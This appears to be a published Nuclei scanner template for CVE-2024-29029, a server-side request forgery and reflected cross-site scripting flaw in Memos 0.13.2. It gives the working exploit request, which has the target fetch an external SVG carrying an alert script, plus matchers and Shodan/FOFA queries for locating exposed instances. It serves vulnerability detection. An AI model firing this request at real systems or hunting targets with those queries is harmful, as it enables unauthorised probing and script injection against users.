An SSRF vulnerability exists at the `/o/get/image` that allows unauthenticated users to enumerate the internal network and retrieve images. The response from the image request is then copied into the response of the current server request, causing a reflected XSS vulnerability.
PoC代码[已公开]
id: CVE-2024-29029
info:
name: Memos 0.13.2 - Cross-Site Scripting & SSRF
author: ritikchaddha
severity: medium
description: |
An SSRF vulnerability exists at the `/o/get/image` that allows unauthenticated users to enumerate the internal network and retrieve images. The response from the image request is then copied into the response of the current server request, causing a reflected XSS vulnerability.
reference:
- https://securitylab.github.com/advisories/GHSL-2023-154_GHSL-2023-156_memos/
- https://nvd.nist.gov/vuln/detail/CVE-2024-29029
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
shodan-query: title:"Memos"
fofa-query: title="Memos"
tags: cve,cve2024,xss,memos
http:
- method: GET
path:
- "{{BaseURL}}/o/get/image?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "alert(document.domain);"
- "<?xml version"
- '<script type="text/javascript">'
condition: and
- type: word
part: header
words:
- "Content-Security-Policy: default-src 'none';"
negative: true
- type: status
status:
- 200
# digest: 490a0046304402200294e02316144d5524163e7a692fe211228540eb012abc2aa4a6e2d849321a0102203d818ed3fddcebe6453cc2c65fa3debbf2054e343b2dbeb04f2ab3dbd41fa961:922c64590222798bb761d5b6d8e72950